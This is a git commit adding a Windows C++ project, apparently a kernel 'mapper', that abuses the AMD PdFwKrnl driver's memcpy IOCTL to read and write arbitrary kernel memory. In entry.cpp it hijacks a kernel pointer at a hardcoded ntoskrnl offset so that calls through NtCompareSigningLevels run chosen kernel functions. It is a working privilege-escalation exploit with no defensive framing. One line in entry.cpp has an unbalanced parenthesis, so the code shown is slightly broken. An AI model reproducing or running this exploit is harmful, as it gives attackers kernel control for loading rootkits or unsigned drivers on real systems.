commit 7c1303567314a6eee3c7bde89b584656e469bc2d
Author: dpcpointer <heapallocation@proton.me>
Date:   Wed May 28 19:20:14 2025 -0600

    Add files via upload

diff --git a/source/PdFwKrnl.cpp b/source/PdFwKrnl.cpp
new file mode 100644
index 0000000..4ed7c97
--- /dev/null
+++ b/source/PdFwKrnl.cpp
@@ -0,0 +1,145 @@
+#pragma once
+
+#include "pdfwkrnl.h"
+#include <vector>
+#include <string.h>
+
+_pdfwkrnl::_pdfwkrnl() : hDevice(INVALID_HANDLE_VALUE) {}
+
+_pdfwkrnl::~_pdfwkrnl() { detach(); }
+
+bool _pdfwkrnl::attach() {
+    if (hDevice != INVALID_HANDLE_VALUE) {
+        return true;
+    }
+
+    hDevice = CreateFileW(L"\\\\.\\PdFwKrnl",
+        GENERIC_READ | GENERIC_WRITE,
+        FILE_SHARE_READ | FILE_SHARE_WRITE,
+        NULL,
+        OPEN_EXISTING,
+        FILE_ATTRIBUTE_NORMAL,
+        NULL);
+
+    return hDevice != INVALID_HANDLE_VALUE;
+}
+
+void _pdfwkrnl::detach() {
+    if (hDevice != INVALID_HANDLE_VALUE) {
+        CloseHandle(hDevice);
+        hDevice = INVALID_HANDLE_VALUE;
+    }
+}
+
+uint64_t _pdfwkrnl::get_ntoskrnl_base() {
+    if (hDevice == INVALID_HANDLE_VALUE) {
+        return 0;
+    }
+
+    uint64_t base_address = 0;
+    DWORD CbNeeded = 0;
+    LPVOID Drivers[1024]{};
+    if (EnumDeviceDrivers(Drivers, sizeof(Drivers), &CbNeeded)) {
+        base_address = (uint64_t)Drivers[0];
+    }
+
+    return base_address;
+}
+
+uint64_t _pdfwkrnl::get_ntoskrnl_export(const char* function) {
+    uint64_t ntoskrnl_base = get_ntoskrnl_base();
+    if (!ntoskrnl_base)
+        return 0;
+
+    IMAGE_DOS_HEADER dos_headers = read_virtual_memory<IMAGE_DOS_HEADER>(ntoskrnl_base);
+    if (dos_headers.e_magic != IMAGE_DOS_SIGNATURE)
+        return 0;
+
+    IMAGE_NT_HEADERS nt_headers = read_virtual_memory<IMAGE_NT_HEADERS>(ntoskrnl_base + dos_headers.e_lfanew);
+
+    if (nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) {
+        auto image_export_directory = ntoskrnl_base + nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
+
+        IMAGE_EXPORT_DIRECTORY export_directory = read_virtual_memory<IMAGE_EXPORT_DIRECTORY>(image_export_directory);
+
+        if (export_directory.NumberOfFunctions > 0) {
+            auto address_of_functions = ntoskrnl_base + export_directory.AddressOfFunctions;
+            auto address_of_names = ntoskrnl_base + export_directory.AddressOfNames;
+            auto address_of_name_ordinals = ntoskrnl_base + export_directory.AddressOfNameOrdinals;
+
+            std::vector<DWORD> func_rvas(export_directory.NumberOfFunctions);
+            std::vector<DWORD> name_rvas(export_directory.NumberOfNames);
+            std::vector<WORD> ordinals(export_directory.NumberOfNames);
+
+            if (!read_virtual_memory(address_of_functions, func_rvas.data(), export_directory.NumberOfFunctions * sizeof(DWORD)))
+                return -1;
+
+            if (!read_virtual_memory(address_of_names, name_rvas.data(), export_directory.NumberOfNames * sizeof(DWORD)))
+                return -1;
+
+            if (!read_virtual_memory(address_of_name_ordinals, ordinals.data(), export_directory.NumberOfNames * sizeof(WORD)))
+                return -1;
+
+            for (DWORD i = 0; i < export_directory.NumberOfNames; i++) {
+                char func_name[256] = { 0 };
+                auto name_address = ntoskrnl_base + name_rvas[i];
+
+                if (!read_virtual_memory(name_address, func_name, sizeof(func_name)))
+                    continue;
+
+                func_name[255] = '\0';
+
+                auto ordinal = export_directory.Base + ordinals[i];
+                auto func_rva = func_rvas[ordinals[i]];
+                auto func_address = ntoskrnl_base + func_rva;
+
+                if (!strcmp(func_name, function))
+                    return func_address;
+            }
+        }
+    }
+
+    return 0;
+}
+
+bool _pdfwkrnl::read_virtual_memory(UINT64 address, void* buffer, ULONG size) {
+    if (hDevice == INVALID_HANDLE_VALUE || !buffer || !size || !address) {
+        return false;
+    }
+
+    PDFW_MEMCPY memcpy_data = { 0 };
+    memcpy_data.Destination = buffer;
+    memcpy_data.Source = (PVOID)address;
+    memcpy_data.Size = size;
+
+    DWORD bytes_returned;
+    return DeviceIoControl(hDevice,
+        IOCTL_AMDPDFW_MEMCPY,
+        &memcpy_data,
+        sizeof(PDFW_MEMCPY),
+        &memcpy_data,
+        sizeof(PDFW_MEMCPY),
+        &bytes_returned,
+        NULL) != 0;
+}
+
+bool _pdfwkrnl::write_virtual_memory(UINT64 address, void* buffer, ULONG size) {
+    if (hDevice == INVALID_HANDLE_VALUE || !buffer || !size || !address) {
+        return false;
+    }
+
+    PDFW_MEMCPY memcpy_data = { 0 };
+    memcpy_data.Destination = (PVOID)address;
+    memcpy_data.Source = buffer;
+    memcpy_data.Size = size;
+
+    DWORD bytes_returned;
+    return DeviceIoControl(hDevice,
+        IOCTL_AMDPDFW_MEMCPY,
+        &memcpy_data,
+        sizeof(PDFW_MEMCPY),
+        &memcpy_data,
+        sizeof(PDFW_MEMCPY),
+        &bytes_returned,
+        NULL) != 0;
+}
\ No newline at end of file
diff --git a/source/PdFwKrnl.h b/source/PdFwKrnl.h
new file mode 100644
index 0000000..ae58ac6
--- /dev/null
+++ b/source/PdFwKrnl.h
@@ -0,0 +1,43 @@
+#pragma once
+
+#include <Windows.h>
+#include <winioctl.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <Psapi.h>
+#include <vector>
+#include <string>
+#include <stdexcept>
+
+const ULONG IOCTL_AMDPDFW_MEMCPY = CTL_CODE(0x8000, 0x805, METHOD_BUFFERED, FILE_ANY_ACCESS);
+
+typedef struct _PDFW_MEMCPY {
+    BYTE    Reserved[16];
+    PVOID   Destination;
+    PVOID   Source;
+    PVOID   Reserved2;
+    DWORD   Size;
+    DWORD   Reserved3;
+} PDFW_MEMCPY, * PPDFW_MEMCPY;
+
+inline class _pdfwkrnl {
+private:
+    HANDLE hDevice;
+
+public:
+    _pdfwkrnl();
+    ~_pdfwkrnl();
+    bool attach();
+    void detach();
+    uint64_t get_ntoskrnl_base();
+    uint64_t get_ntoskrnl_export(const char* function);
+    bool read_virtual_memory(UINT64 address, void* buffer, ULONG size);
+    bool write_virtual_memory(UINT64 address, void* buffer, ULONG size);
+
+    template <typename T>
+    T read_virtual_memory(UINT64 address) {
+        T buffer{};
+        read_virtual_memory(address, &buffer, sizeof(T));
+        return buffer;
+    }
+}pdfwkrnl;
\ No newline at end of file
diff --git a/source/entry.cpp b/source/entry.cpp
new file mode 100644
index 0000000..31cd76b
--- /dev/null
+++ b/source/entry.cpp
@@ -0,0 +1,49 @@
+#include "PdFwKrnl.h"
+
+template <typename T, typename... Args>
+T call_kernel_function(const char* function_name, Args... args){
+
+	uint64_t ntoskrnl_base = pdfwkrnl.get_ntoskrnl_base();
+	if (!ntoskrnl_base)
+		return T{};
+
+	uint64_t function_address = pdfwkrnl.get_ntoskrnl_export(function_name);
+	if (!function_address)
+		return T{};
+
+	uint64_t qword_swap = ntoskrnl_base + 0xC1DA00;
+	uint64_t qword_original = 0;
+
+	if (!pdfwkrnl.read_virtual_memory(qword_swap, &qword_original, sizeof(uint64_t)))
+		return T{};
+
+	if (!pdfwkrnl.write_virtual_memory(qword_swap, &function_address, sizeof(uint64_t)))
+		return T{};
+	
+	HMODULE m_ntdll = GetModuleHandleA("ntdll.dll");
+	if (!m_ntdll)
+		return T{};
+
+	FARPROC NtCompareSigningLevels = GetProcAddress(m_ntdll, "NtCompareSigningLevels");
+
+	using FuncPtr = T(__stdcall*)(Args...);
+	FuncPtr func = reinterpret_cast<FuncPtr>(NtCompareSigningLevels);
+
+	T return_value = func(args...);
+
+	pdfwkrnl.write_virtual_memory(qword_swap, &qword_original, sizeof(uint64_t); // swap back
+
+	return return_value;
+}
+
+int main() {
+	if (!pdfwkrnl.attach())
+		return -1;
+
+	printf("attached to kernel\n");
+
+	call_kernel_function<void>("DbgPrint", "called kernel function");
+
+	pdfwkrnl.detach();
+	return 0;
+}
\ No newline at end of file
diff --git a/source/ze-mappar.sln b/source/ze-mappar.sln
new file mode 100644
index 0000000..4e30332
--- /dev/null
+++ b/source/ze-mappar.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.14.36121.58 d17.14
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ze-mappar", "ze-mappar.vcxproj", "{82E90A15-BED1-4404-8BE1-6B512F4126AB}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{82E90A15-BED1-4404-8BE1-6B512F4126AB}.Debug|x64.ActiveCfg = Debug|x64
+		{82E90A15-BED1-4404-8BE1-6B512F4126AB}.Debug|x64.Build.0 = Debug|x64
+		{82E90A15-BED1-4404-8BE1-6B512F4126AB}.Debug|x86.ActiveCfg = Debug|Win32
+		{82E90A15-BED1-4404-8BE1-6B512F4126AB}.Debug|x86.Build.0 = Debug|Win32
+		{82E90A15-BED1-4404-8BE1-6B512F4126AB}.Release|x64.ActiveCfg = Release|x64
+		{82E90A15-BED1-4404-8BE1-6B512F4126AB}.Release|x64.Build.0 = Release|x64
+		{82E90A15-BED1-4404-8BE1-6B512F4126AB}.Release|x86.ActiveCfg = Release|Win32
+		{82E90A15-BED1-4404-8BE1-6B512F4126AB}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {A655719F-F42D-483D-B3F0-E58B895AFBC9}
+	EndGlobalSection
+EndGlobal
diff --git a/source/ze-mappar.vcxproj b/source/ze-mappar.vcxproj
new file mode 100644
index 0000000..edabc83
--- /dev/null
+++ b/source/ze-mappar.vcxproj
@@ -0,0 +1,145 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>17.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{82e90a15-bed1-4404-8be1-6b512f4126ab}</ProjectGuid>
+    <RootNamespace>zemappar</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <OutDir>$(SolutionDir)\build\</OutDir>
+    <IntDir>$(SolutionDir)\build\objects\</IntDir>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <OutDir>$(SolutionDir)\build\</OutDir>
+    <IntDir>$(SolutionDir)\build\objects\</IntDir>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <LanguageStandard>stdcpp17</LanguageStandard>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <LanguageStandard>stdcpp17</LanguageStandard>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="PdFwKrnl.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="entry.cpp" />
+    <ClCompile Include="PdFwKrnl.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/source/ze-mappar.vcxproj.filters b/source/ze-mappar.vcxproj.filters
new file mode 100644
index 0000000..1eaa489
--- /dev/null
+++ b/source/ze-mappar.vcxproj.filters
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="PdFwKrnl.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="PdFwKrnl.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="entry.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/source/ze-mappar.vcxproj.user b/source/ze-mappar.vcxproj.user
new file mode 100644
index 0000000..429333d
--- /dev/null
+++ b/source/ze-mappar.vcxproj.user
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <ShowAllFiles>true</ShowAllFiles>
+  </PropertyGroup>
+</Project>
\ No newline at end of file